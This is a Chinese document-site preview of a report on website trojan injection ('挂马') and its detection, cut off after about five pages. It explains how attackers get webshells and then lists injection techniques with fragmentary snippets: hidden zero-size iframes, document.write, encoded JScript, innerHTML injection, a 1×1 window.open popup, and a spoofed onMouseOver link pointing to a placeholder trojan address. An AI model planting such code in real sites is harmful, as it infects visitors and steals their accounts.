网站挂马及检测技术

网站挂马及检测技术

ID:37788316

大小:36.00 KB

页数:5页

时间:2019-05-31

网站挂马及检测技术_第1页
网站挂马及检测技术_第2页
网站挂马及检测技术_第3页
网站挂马及检测技术_第4页
网站挂马及检测技术_第5页
资源描述:

《网站挂马及检测技术》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库

1、网站挂马与检测技术报告什么是挂马?所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day,等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。网站挂马的危害危害和应用的普及程度有关,上网人人

2、都会,也就是说,人人都可能中毒。据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。很多游戏网站被挂马,黑客目的就是盗取浏览该网站玩家的游戏账号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。  如果不小心进入了已被挂马的网站,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。挂马泛滥的原因利。病毒木马黑色产业链有丰厚的利润,去年南京警方抓获的大

3、小姐系列木马案,犯罪集团3个月获得非常收益3000万。网络应用越普及,黑色产业链的从业者收益也就越高。挂马范围哪些网站容易被挂马呢?越是流量高的网站对黑客越有吸引力,黑客攻破一个管理上有漏洞并且网站流量很高的网站,一天就可以感染数百万人。那些与公共事业密切相关的网站,比如政府机关的网站,色情网站,视频网站,聊天交友网站,提供盗版软件破解工具的网站最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。网站挂马的常见方式1.框架挂马

4、ight=0>其中“地址”处可以输入恶意网站链接等。属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。这个方法也是挂马最常用的一段代码,但是随着网站管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。2.js文件挂马只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS

5、代码页面有没有被故意拉长等。相比iframe这个标签,这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script标签。利用js引入网页木马也有多种方法:在js中直接写出框架网页木马示例代码如下:document.write("");指定language的属性为"JScript.Encode"还可以引入其他扩展名

6、的js代码,这样就更加具有迷惑性,示例代码如下:;利用js更改body的innerHTML属性,引入网页木马如果对内容进行编码的话,不但能绕过杀毒软件的检测,而且增加了解密的难度,示例代码如下:op.document.body.innerHTML=top.document.body.innerHTML+'r

7、%3E%3C/iframe%3E';利用JavaScript的window.open方法打开一个不可见的新窗口示例代码如下:window.open("网页木马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");;利用URL欺骗示例代码如下:ahref="http://www.163.com(/

8、迷惑用户的链接地址,显示这个地址指向木马地址)"onMouseOver="www_163_com();returntrue;">页面要显示的正常内容:functionwww_163_com(){varurl="网页木马地址";open(url,"NewWindow","toolbar=no,location=no,directorie

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。